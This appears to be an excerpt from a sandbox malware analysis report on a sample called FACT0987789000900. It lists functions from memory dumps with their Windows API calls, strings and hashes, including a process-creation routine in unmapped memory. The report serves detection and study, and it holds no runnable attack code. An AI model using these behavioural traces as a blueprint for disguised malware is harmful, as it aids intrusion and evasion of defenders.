Instruction Fuzzy Hash: 5851A3724047409BC714EF66E9A189BBBF4BF6A305F40053FF645932A0EB34990CDB66

Function 004B34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 004B34FE

Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 004B3539
__wopenfile.LIBCMT ref: 004B3549

Strings

<G, xrefs: 004B34CD, 004B34F0, 004B34FC

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: a3bf1ff179f3f01342d0f1264a1654dce11ee05b470100393a4379aa97ae16d8
Instruction ID: 86f97656ad3f1bf097c24c3aba2d6b028c88f78890793e06f84bd18a4fa27f97
Opcode Fuzzy Hash: a3bf1ff179f3f01342d0f1264a1654dce11ee05b470100393a4379aa97ae16d8
Instruction Fuzzy Hash: 88112B70900205AEDB21BF738C026EF3AB0AF45754B15891FE415C7281EB3CCA019779

Function 004AD298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004AD28B,SwapMouseButtons,00000004,?), ref: 004AD2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,004AD28B,SwapMouseButtons,00000004,?,?,?,?,004AC865), ref: 004AD2DD
RegCloseKey.KERNELBASE(00000000,?,?,004AD28B,SwapMouseButtons,00000004,?,?,?,?,004AC865), ref: 004AD2FF

Strings

Control Panel\Mouse, xrefs: 004AD2BA

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 6b4d493f246bcabe3365276c12a5360feb1b4db05fe8c7ca43ad301d856bd84a
Instruction ID: 84c564db0e653120fd31a3aff7f22d74974cd7342f8233f3190396cfe106ea45
Opcode Fuzzy Hash: 6b4d493f246bcabe3365276c12a5360feb1b4db05fe8c7ca43ad301d856bd84a
Instruction Fuzzy Hash: 65117075911208BFDF108F64CC44EEF77B8EF59740F00445AF802D7210E635AE459764

Function 004B365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 004B36B7
_memcpy_s.LIBCMT ref: 004B3729
__filbuf.LIBCMT ref: 004B37AA
_memset.LIBCMT ref: 004B37EE

Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction ID: 19c6327dfba7fd40d637b4279f86ebc986aa641c67da614ef322a67b3dbe5e5a
Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction Fuzzy Hash: 0651CAB0A00205ABDB249F6B88455DF77A5AF40325F24872FF425863D0DB78DF518B79

Function 004DC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00494517: _fseek.LIBCMT ref: 0049452F

Part of subcall function 004DC56D: _wcscmp.LIBCMT ref: 004DC65D
Part of subcall function 004DC56D: _wcscmp.LIBCMT ref: 004DC670

_free.LIBCMT ref: 004DC4DD
_free.LIBCMT ref: 004DC4E4
_free.LIBCMT ref: 004DC54F

Part of subcall function 004B1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,004B7A85), ref: 004B1CB1
Part of subcall function 004B1C9D: GetLastError.KERNEL32(00000000,?,004B7A85), ref: 004B1CC3

_free.LIBCMT ref: 004DC557

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
Instruction ID: c77455c4a648138f66d60b348cc4758c9ed0de8fa3a278b937f64bbe48a76ffc
Opcode Fuzzy Hash: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
Instruction Fuzzy Hash: 9B516CB1904219AFDF149F65DC91AAEBBB9EF48304F1000AFF219A3351DB755A80CF59

Function 004AEB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004AEBB2

Part of subcall function 004951AF: _memset.LIBCMT ref: 0049522F
Part of subcall function 004951AF: _wcscpy.LIBCMT ref: 00495283
Part of subcall function 004951AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00495293

KillTimer.USER32(?,00000001,?,?), ref: 004AEC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004AEC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00503C88

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: c1df77513c8e93a4a6886c9b6d16a3d22aa706376ab13906b7efbd85faa7d75a
Instruction ID: 091236341d9c45ff0a68e3295f6493fd19019c3ceadf468dd217b9cb8c5d1fc0
Opcode Fuzzy Hash: c1df77513c8e93a4a6886c9b6d16a3d22aa706376ab13906b7efbd85faa7d75a
Instruction Fuzzy Hash: 6E21DA705047949FF73397248859BEBBFECAF11318F04045EE69A96281C3746E84CB55

Function 005AFF90 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,00001000,00000004,?,00000000), ref: 005B0147
VirtualProtect.KERNELBASE(?,00001000), ref: 005B015C

Strings

as failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array va, xrefs: 005AFF91

Memory Dump Source

Source File: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ProtectVirtual
String ID: as failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array va
API String ID: 544645111-1882358474
Opcode ID: 0bf70e1fe289e165fbea26a3a945e7cd97a4af74671d22bdfa6f6cd26151ff97
Instruction ID: 474b719d42e6dc16cd321f41b36d4e33ce997c41b2380582a9e0dbae69fb3e38
Opcode Fuzzy Hash: 0bf70e1fe289e165fbea26a3a945e7cd97a4af74671d22bdfa6f6cd26151ff97
Instruction Fuzzy Hash: 46512572A543569FD720AEB8CC847B6BFA4FB423247681739D5E1C73C6E7A46806C360

Function 004AF4EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 004B395C: __FF_MSGBANNER.LIBCMT ref: 004B3973
Part of subcall function 004B395C: __NMSG_WRITE.LIBCMT ref: 004B397A
Part of subcall function 004B395C: RtlAllocateHeap.NTDLL(01300000,00000000,00000001), ref: 004B399F

std::exception::exception.LIBCMT ref: 004AF51E
__CxxThrowException@8.LIBCMT ref: 004AF533

Part of subcall function 004B6805: RaiseException.KERNEL32(?,?,0000000E,00546A30,?,?,?,004AF538,0000000E,00546A30,?,00000001), ref: 004B6856

Strings

bad allocation, xrefs: 004AF517

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID: bad allocation
API String ID: 3902256705-2104205924
Opcode ID: 9fcf5365c30e7ffd7d858db2caaad6c75e3515c8d43f4f7bf8961d560494e04b
Instruction ID: dc4990b0ff6d3af6e15a2dbe011e1a94a4380812264a672e3902580c523567d5
Opcode Fuzzy Hash: 9fcf5365c30e7ffd7d858db2caaad6c75e3515c8d43f4f7bf8961d560494e04b
Instruction Fuzzy Hash: EAF08131504219A7D704BE9AD8019DE7BE8AF15358F60402BF90492181DBB8A68487B9

Function 01347B70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01347BB5
ExitProcess.KERNEL32(00000000), ref: 01347BD4

Strings

D, xrefs: 01347B81

Memory Dump Source

Source File: 00000003.00000002.1300511747.0000000001346000.00000040.00000020.00020000.00000000.sdmp, Offset: 01346000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1346000_FACT0987789000900.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
Instruction ID: bbc6b443a102ae528f474dac46822412719d53eeafb5d8a6f18dcd82641a17d5
Opcode Fuzzy Hash: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
Instruction Fuzzy Hash: C2F0EC7554024DABDB60DFE4CC49FEE77BCBF08705F108508FB0A9A180DB74A6088B61

Function 004DC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 004DC72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 004DC746

Strings

aut, xrefs: 004DC740

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 821ec9b1846ef78a6eb6d992ef4f7dbf64d15ca3621219ea62e52a37c88e4885
Instruction ID: b9ed039b2ff15fedc97336a5ff177bc58f8360f879c91b4288d6f66696da2b0f
Opcode Fuzzy Hash: 821ec9b1846ef78a6eb6d992ef4f7dbf64d15ca3621219ea62e52a37c88e4885
Instruction Fuzzy Hash: 9ED05E7950030EBBDB10AB90DC0EFCA7B7CA714708F0041A07A60A50B1DAB4E6998B64

Function 004EF8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ab30830fa0eb3f838868b0d6e474fe6b3b36a05303fc5cf4ef934a89be421a3
Instruction ID: 2a19ac058023f2a758e1cbdceee92e0a2dd00e4bba77f2ab35559c9e25919a5f
Opcode Fuzzy Hash: 4ab30830fa0eb3f838868b0d6e474fe6b3b36a05303fc5cf4ef934a89be421a3
Instruction Fuzzy Hash: 18F17D716043419FCB10DF25C891B5ABBE5FF88318F10892EF9959B392D778E909CB86

Function 00494FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00495022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 004950CB

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 4cfe0ba22f167e201dfaa056fc9180acf9fea1ac83e336123510c1e29a6d4e18
Instruction ID: 5727472faf4c1ad8c257c9e49c05f5e7b417e5f320886a083ba693fb3669ed6d
Opcode Fuzzy Hash: 4cfe0ba22f167e201dfaa056fc9180acf9fea1ac83e336123510c1e29a6d4e18
Instruction Fuzzy Hash: 0A31AEB0504B00CFCB21EF24D84569BBFE8FF58309F10092FE59A82250E775A948CB9A

Function 004B395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 004B3973

Part of subcall function 004B81C2: __NMSG_WRITE.LIBCMT ref: 004B81E9
Part of subcall function 004B81C2: __NMSG_WRITE.LIBCMT ref: 004B81F3

__NMSG_WRITE.LIBCMT ref: 004B397A

Part of subcall function 004B821F: GetModuleFileNameW.KERNEL32(00000000,00550312,00000104,00000000,00000001,00000000), ref: 004B82B1
Part of subcall function 004B821F: ___crtMessageBoxW.LIBCMT ref: 004B835F

Part of subcall function 004B1145: ___crtCorExitProcess.LIBCMT ref: 004B114B
Part of subcall function 004B1145: ExitProcess.KERNEL32 ref: 004B1154

Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E

RtlAllocateHeap.NTDLL(01300000,00000000,00000001), ref: 004B399F

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 9035c8b74350df580c7ade0a6cd2425cdc02b339bf148654d971984aeabf39ad
Instruction ID: ef6da1eee76f5b3a9dd28cd78ae54239fa49cdc9da80e9d36bac2e63755dcb7f
Opcode Fuzzy Hash: 9035c8b74350df580c7ade0a6cd2425cdc02b339bf148654d971984aeabf39ad
Instruction Fuzzy Hash: 4901D6B12453019AE6153F3BEC52AEF23589B91B2AF60012FF5019B291DFBC9D00867C

Function 004DC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,004DC385,?,?,?,?,?,00000004), ref: 004DC6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,004DC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004DC708
CloseHandle.KERNEL32(00000000,?,004DC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004DC70F

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: f4ab48da5113b350943d3b6ab7b228d21659ae5692a865a010261a4465add287
Instruction ID: 5db455d213d38412d93185cd73c26abce7e7ecfd0f1ce45c15a073e1791b445a
Opcode Fuzzy Hash: f4ab48da5113b350943d3b6ab7b228d21659ae5692a865a010261a4465add287
Instruction Fuzzy Hash: F1E08632180214B7DB211B54AC09FCA7B68AB15760F108111FB24691E0D7B12555D7A8

Function 004DBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004DBB72

Part of subcall function 004B1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,004B7A85), ref: 004B1CB1
Part of subcall function 004B1C9D: GetLastError.KERNEL32(00000000,?,004B7A85), ref: 004B1CC3

_free.LIBCMT ref: 004DBB83
_free.LIBCMT ref: 004DBB95

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
Instruction ID: 17c08d1dba21ea0c35669d443b0c7316544f1095a21cbe164255a814454cbadc
Opcode Fuzzy Hash: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
Instruction Fuzzy Hash: E5E0C2A120070082CB20693A6E64EF317DC8F04391704080FB459E3342CF2CF84088FC

Function 00492322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 004922A4: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00492303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004925A1
CoInitialize.OLE32(00000000), ref: 00492618
CloseHandle.KERNEL32(00000000), ref: 0050503A

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Handle$ClipboardCloseFormatInitializeRegister
String ID:
API String ID: 458326420-0
Opcode ID: 234d104d8a2f2d764da8e4a2553adb9ad477f76ec38c1999e412898ad1b7d630
Instruction ID: 1d91e88a66744747f35e2477c4b42c7835dc8882a04e51c1a33e9d24961b932d
Opcode Fuzzy Hash: 234d104d8a2f2d764da8e4a2553adb9ad477f76ec38c1999e412898ad1b7d630
Instruction Fuzzy Hash: DB71CFB8901B419ACB04EF6BA9B0699BFE4B778346B81466ED009C7771DB74480CEF1D

Function 004DBBE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 004DBC18

Strings

EA06, xrefs: 004DBC46

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: e243572e48be38f5961eb81d560dcf66b3270130f7376f4384b515887a79e528
